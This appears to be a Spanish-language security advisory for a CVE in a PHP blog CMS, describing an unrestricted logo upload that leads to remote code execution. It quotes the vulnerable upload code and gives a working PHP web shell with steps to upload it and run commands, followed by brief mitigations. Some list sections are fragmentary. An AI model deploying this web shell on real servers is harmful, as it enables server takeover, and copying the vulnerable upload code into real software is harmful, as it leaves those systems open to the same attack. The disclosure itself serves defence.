
CVE-2025-15495 - Carga arbitraria de archivos que conduce a Ejecución Remota de Código (RCE)
BiggiDroid – Simple PHP Blog CMS Página del producto: https://biggidroid.com/product/simple-php-blog/
Crítica
CVSS (Estimado): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
El Simple PHP Blog CMS contiene una vulnerabilidad de carga de archivos sin restricciones en la funcionalidad de carga del logotipo del sitio del panel de administración. Un atacante autenticado puede cargar un archivo PHP malicioso disfrazado como imagen, que se almacena en un directorio accesible desde la web y es ejecutado por el servidor, lo que resulta en ejecución remota de comandos.
Panel de Administración → Actualizar Logotipo del Sitio
Fragmento de código vulnerable relevante:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
Crear un archivo llamado shell.php:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php como archivo de logotipo📌 La aplicación acepta el archivo PHP sin validación
Después de la carga, el archivo es accesible en:
http://127.0.0.1/image/shell.php
Ejecutar comandos del sistema:
http://127.0.0.1/image/shell.php?cmd=dir
El servidor ejecuta comandos del SO y devuelve la salida, confirmando la Ejecución Remota de Código.





Un atacante puede:
Esta vulnerabilidad puede llevar a la toma total del servidor.
.htaccessRestringir extensiones de archivo
$allowed = ['jpg','jpeg','png','gif'];
Validar tipo MIME
finfo_file()
Renombrar archivos cargados